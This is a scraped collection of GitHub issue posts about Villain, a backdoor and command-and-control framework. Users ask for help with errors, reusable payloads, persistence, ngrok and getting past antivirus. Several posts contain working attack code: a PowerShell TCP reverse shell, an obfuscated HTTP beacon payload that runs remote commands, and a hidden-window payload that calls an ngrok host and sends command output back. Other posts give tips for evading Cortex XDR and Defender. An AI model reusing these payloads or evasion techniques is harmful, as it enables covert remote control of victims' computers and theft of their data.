t3l3machus / villain Goto Github PK

every time i run

generate os=windows lhost=eth0

it create payload with unique session ID and it will work only on one target, i can't execute same payload on 2 targets i have to create payload for each target separately!!

how to allow same payload to be executed on multiple targets at the same time??

Thank you

Can You Please Shere You randomize_variables.py file

How do I fix this error:

Thanks in Advance!

I have tested the payloads through “Cortex XDR” EDR and, whilst a good percentage of the payloads are detected, some make it through.

It looks like that when “Invoke-Expression” is used, this string is detected by XDR, even if it is obfuscated:

e.g. $fb=inV'oKe-EXp'resSION

However, when the alias of the command is used “iex”, the payload is undetected.

e.g. $fa4=i'ex'

Hello

Can you tell me how to generate .ps1 file

Hi! Great tool, very interesting, so i had a question, is there a way to reuse payloads? Id like to try setting up a ps1 file in the startup or something like that (just playing around) i tryed to check how the code works but i have a smooth brain lol, thanks for any info! :)

On Line 11: from Core.common import *
On Line 12 inside /Villain/Core/common.py

from Crypto.Cipher import AES

Traceback (most recent call last):
  File "/home/nullsec/Villain/Villain.py", line 11, in <module>
    from Core.common import *
  File "/home/nullsec/Villain/Core/common.py", line 12, in <module>
    from Crypto.Cipher import AES
ModuleNotFoundError: No module named 'Crypto'

Mitigation attempts

I tried re-installing Villain from the official github

pip3 install -r requirements.txt

Installed all dependencies and the error still persists

pip3 install Crypto

re-ran the script and the issue still persists.

Villain.py [-h] [-p PORT] [-x HOAX_PORT] [-c CERTFILE] [-k KEYFILE] [-u] [-q]

I've taken a look at the code but for the life of me I cannot work out what -h does for Villain.py, can you please explain for me?

can we add features like the -ng parameter to run over the internet?

I get an error when trying to generate a windows payload with domain specified instead of lhost
Villain was started with the command "sudo python3 Villain.py -c /etc/letsencrypt/live/mydomain.com/fullchain.pem -k /etc/letsencrypt/live/mydomain.com/privkey.pem"
when i went to generate a payload i use this syntax "generate os=windows domain=mydomain.com" i have tried appending www. or removing the .com or even supplying google.com but no matter what is supplied the error message given back is always "Error parsing arguments. Check your input and try again."
I will say that my domain is a bit longer than normal at 28 characters including the .com just in case that contributes to the problem.
Any assistance you can offer is appreciated.

Hello.

I really like how you have upgraded the hoaxshell program. It is just great. I was experimenting with USB Rubber Ducky on a previous program (hoaxshell) and it worked perfectly (persistant backdoor). But now that payload cannot be reused this approach is useless because you would have to reprogram the USB for every exploited machine :/. Will it be possible to add function to reuse the generated payload?

Thank you!

No shell was generated, after following all the steps, don't know what i did wrong.

[�Debug��] Hoaxshell HTTP server failed to start. Port 8080 seems to already be in use.

How do i use another port? since i dont know whats using port 8080 i tried on both ubuntu and kali linux

Villain > ----------------------------------------
Exception occurred during processing of request from ('10.10.187.15', 36078)
Traceback (most recent call last):
File "/usr/lib/python3.11/socketserver.py", line 317, in _handle_request_noblock
self.process_request(request, client_address)
File "/usr/lib/python3.11/socketserver.py", line 348, in process_request
self.finish_request(request, client_address)
File "/usr/lib/python3.11/socketserver.py", line 361, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python3.11/socketserver.py", line 755, in init
self.handle()
File "/usr/lib/python3.11/http/server.py", line 432, in handle
self.handle_one_request()
File "/usr/lib/python3.11/http/server.py", line 420, in handle_one_request
method()
File "/root/Villain/Core/villain_core.py", line 953, in do_GET
Sessions_manager.active_sessions[session_id]['Username'] = url_split[2]
~~~~~~~~~^^^
IndexError: list index out of range
???

Awesome work Panagiotis! Last defender Updates seeams to block Payload (rules AMSI) even with encoded or obfuscation
While using kind of hoaxshell script ( nc -l - p 9001 on the C2c host , MDefender with AMSI Cloud protection does not catch it, nor PaloAlto FW..) does this is due to the persistence of the session ?

$LHOST = "C2C ip adress"
$LPORT = 9001
$TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT)
$NetworkStream = $TCPClient.GetStream()
$StreamReader = New-Object IO.StreamReader($NetworkStream)
$StreamWriter = New-Object IO.StreamWriter($NetworkStream)
$StreamWriter.AutoFlush = $true
$Buffer = New-Object System.Byte[] 1024
while ($TCPClient.Connected) {
    while ($NetworkStream.DataAvailable) {
        $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length)
        $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1)
     }
    if ($TCPClient.Connected -and $Code.Length -gt 1) {
        $Output = try {
            Invoke-Expression ($Code) 2>&1
        }
        catch {
            $_
        }
        $StreamWriter.Write("$Output`n")
        $Code = $null
    }
}
$TCPClient.Close()
$NetworkStream.Close()
$StreamReader.Close()
$StreamWriter.Close()

I figured out, that changing Invoke-RestMethod for Invoke-WebRequest will do de trick for Windows 2012,
In other hand with windows 7 is not working at all.

Thanks for this amazing work!

Hey guys, your tool is amazing but does not allow the user to change the default local port as the local host . by default, this is aways 8080.

For example:

generate os=windows lhost=10.0.0.1

This works, but if I want to use it with ngrok to avoid port forwarding restrictions, for example, I will need to change the port manually. When I use the 'encode' parameter I need to decode, edit the payload and encode again.

The Local Port parameter could improve the user experience 😉

sudo python3 Villain.py

Traceback (most recent call last):

File "/home/lion/Villain/Villain.py", line 11, in

from Core.common import *

File "/home/lion/Villain/Core/common.py", line 12, in

from Crypto.Cipher import AES

ModuleNotFoundError: No module named 'Crypto'

How to fix isssue:

"(Villain.py:5240): Gtk-CRITICAL **: 01:22:18.649: gtk_clipboard_get_for_display: assertion 'display != NULL' failed
Copy to clipboard failed. You need to do it manually."

`Villain > generate os=windows lhost=eth0 obfuscate
Generating backdoor payload...
StA'Rt-pRoC'ESS $PSHOME\powershell.exe -aRGumeNtLISt {$66068=$('89f6' -rEpLaCe '[89(f|?)6]{4}','192.168.100.18:8080');$0d3='48bc1af5-f038d74'+'f'+'-'+'e6880b83';$4e=$('ht'+'tp:'+'//');$2685=in'VOke-ReSTmeTHod' -usebaSIcParSiNg -UrI $4e$66068/48bc1af5/$env:COmpuTerNaMe/$env:uSerNAme -HeADERS @{"Authorization"=$0d3};while ($true){$04=(in'VOke-ReSTmeTHod' -usebaSIcParSiNg -UrI $4e$66068/f038d74f -HeADERS @{"Authorization"=$0d3});if ($04 -NE ('N'+'o'+'n'+'e')) {$91548c=I'Ex' $04 -ERRorActIoN S'To'p -erroRvaRIABLE 070f;$91548c=O'ut-S'trInG -inpUtoBjEcT $91548c;$a89=in'VOke-ReSTmeTHod' -UrI $4e$66068/e6880b83 -METHOD POST -HeADERS @{"Authorization"=$0d3} -bodY ([SystEm.tExT.encOdInG]::UTF8.GeTBYTes($070f+$91548c) -joIN ' ')} SLe'Ep' 0.8}} -WINdoWStYle H'Id'deN

(Villain.py:5240): Gtk-CRITICAL **: 01:22:18.649: gtk_clipboard_get_for_display: assertion 'display != NULL' failed
Copy to clipboard failed. You need to do it manually.
`

When attempting to add new bots to the session handler, it appears as though there is an odd error:

Exception occurred during processing of request from ('10.129.228.117', 53058)
Traceback (most recent call last):
  File "/usr/lib/python3.10/socketserver.py", line 316, in _handle_request_noblock
    self.process_request(request, client_address)
  File "/usr/lib/python3.10/socketserver.py", line 347, in process_request
    self.finish_request(request, client_address)
  File "/usr/lib/python3.10/socketserver.py", line 360, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.10/socketserver.py", line 747, in __init__
    self.handle()
  File "/usr/lib/python3.10/http/server.py", line 432, in handle
    self.handle_one_request()
  File "/usr/lib/python3.10/http/server.py", line 420, in handle_one_request
    method()
  File "/home/user/clones/villan/Core/villain_core.py", line 910, in do_POST
    Sessions_manager.active_sessions[session_id]['last_received'] = timestamp
KeyError: 'b46f147a-1bf3b0f8-fb09af4e'
----------------------------------------

Attempting to nest the function on line 910 in a try except statement appears to correct the error, but introduces a new one:

Traceback (most recent call last):
  File "/usr/lib/python3.10/socketserver.py", line 316, in _handle_request_noblock
    self.process_request(request, client_address)
  File "/usr/lib/python3.10/socketserver.py", line 347, in process_request
    self.finish_request(request, client_address)
  File "/usr/lib/python3.10/socketserver.py", line 360, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.10/socketserver.py", line 747, in __init__
    self.handle()
  File "/usr/lib/python3.10/http/server.py", line 432, in handle
    self.handle_one_request()
  File "/usr/lib/python3.10/http/server.py", line 420, in handle_one_request
    method()
  File "/home/user/clones/villan/Core/villain_core.py", line 911, in do_POST
    Sessions_manager.active_sessions[session_id]['last_received'] = timestamp
TypeError: 'str' object does not support item assignment
----------------------------------------

When trying to add new bots to the framework, the error message will repeat until the application/C2 is closed.

Also to note, when trying to use this with custom tunnel device names, it does not catch reverse shells, for example if the tunnel name is htb_tun, it will not pick it up as a valid interface. Will future editions include command line options to specify the interface?(I have been editing the settings.py script with the right ip/interface address, but this appears cumbersome)

I am trying to install it in termux but is giving erroe please reles termux version also

is there any file upload and download functionality??

I used obfuscate option but still got detected.

Ngrok compatibility

is there a way to use it with ngrok?

Security tracker:
https://security-tracker.debian.org/tracker/source-package/python-crypto

the payload dose not work

I followed instructions on https://youtu.be/ubNUCvFOmwQ but when i try to hide it like this Start-Process $PSHOME\powershell.exe -ArgumentList {$s='6aa9-80-238-115-54.eu.ngrok.io';$i='343fd7d3-60935f1b-7821cb5e';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/343fd7d3/$env:COMPUTERNAME/$env:USERNAME -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="abc"};for (;;){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/60935f1b -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="abc"});if ($c -ne 'None') {$r=Invoke-Expression $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$x=Invoke-RestMethod -Uri $p$s/7821cb5e -Method POST -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="abc"} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}} -WindowStyle Hidden
there is no error but also I don't have any requests in ngrok server or sessions in Villain ,but when I run this code
$s='6aa9-80-238-115-54.eu.ngrok.io';$i='343fd7d3-60935f1b-7821cb5e';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/343fd7d3/$env:COMPUTERNAME/$env:USERNAME -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="abc"};for (;;){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/60935f1b -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="abc"});if ($c -ne 'None') {$r=Invoke-Expression $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$x=Invoke-RestMethod -Uri $p$s/7821cb5e -Method POST -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="abc"} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}
everything works fine but it is visible for user. Is there a way to hide it?

i can't even use a simple "cat" command in terminal.

Could it be possible to implement also adding meterpreter sessions of phones hacked by apk payload? Or something like that, regarding the possibility to also gain access to phones; hacking computers and smarphones with one tool.

(The script is amazing, thanks man for sharing your knowledge!)

As per the following procedure I followed the steps correctly with no spelling error or anything but Sadly if I run it in my windows 10 powershell it is getting detected
Pls fix it if you can

Hi,
It is impossible for me to establish a session with netcat, the reverse shells generated by villain work correctly, but not the basic reverse shells like with netcat.

convert Villian script into EXE -https://youtube.com/shorts/1uxvjBPqu7I?feature=share

### bypass defender with Villian- http://youtu.be/EZOW40S_cTM

Hello, I am currently having an issue after generating the payload and once I have executed it in the victims machine I get the error. IndexError: list index out of range.
Here is the Screenshot of the error

Because of net-tools being deprecated hostname command (used in Linux payload) might not work properly (observed while executing payload on Arch Linux) causing payload to just not work. I suggest instead of using hostname command use uname -n which gives the same output

I am not sure if it's only me or if others encountered this issue as well.

1. When I use "shell {session ID}" and run commands I observed behavior in the victim machine terminal where I pasted the payload.
2. After closing the terminal where I pasted the payload, the status of the session becomes undefined and it doesn't work anymore.

I tried from my other computer connected to a different internet network. but it doesn't show open session. what should I do?

Hi :), i tryed to make it work but it just doesnt show. I use the "generate os=windows lhost=" command but then i input the payload and it works and then i run seesions and nothing is active. Any recommendations?

I wanna use villain code and msfconsole I did this but when I do this I do get a session but.... it closes and opens 🤣 kinda hilarious but someone help

Hello team,

Kindly enable the option to add reverse proxy's url instead of local IP

I installed the requirements.txt but when I run the app it gives me this error ModuleNotFoundError: No module named 'Crypto'. Please fix it I want to use the tool man.

I tried to troubleshoot but it didn't work. I tried to install the python pycrypto lib but it gives me some kind of installation error.

This is my commandline:

Villain > generate os=windows lhost=eth0 exec_outfile="C:\Users\$env:USERNAME.local\hack.ps1"
Generating backdoor payload...
Error parsing arguments. Check your input and try again.
Villain >

What am I doing wrong?
My python version is 3.11.1

Hello

its really powerful tool i loved it sooooooooooo much

can you give example if i want to excute the payload throw cmd

for example

CMD> powershell -command " 'payload' "

pip3 install -r requirements.txt
error: externally-managed-environment

× This environment is externally managed
╰─> To install Python packages system-wide, try apt install
python3-xyz, where xyz is the package you are trying to
install.

If you wish to install a non-Debian-packaged Python package,
create a virtual environment using python3 -m venv path/to/venv.
Then use path/to/venv/bin/python and path/to/venv/bin/pip. Make
sure you have python3-full installed.

If you wish to install a non-Debian packaged Python application,
it may be easiest to use pipx install xyz, which will manage a
virtual environment for you. Make sure you have pipx installed.

See /usr/share/doc/python3.11/README.venv for more information.

note: If you believe this is a mistake, please contact your Python installation or OS distribution provider. You can override this, at the risk of breaking your Python installation or OS, by passing --break-system-packages.
hint: See PEP 668 for the detailed specification.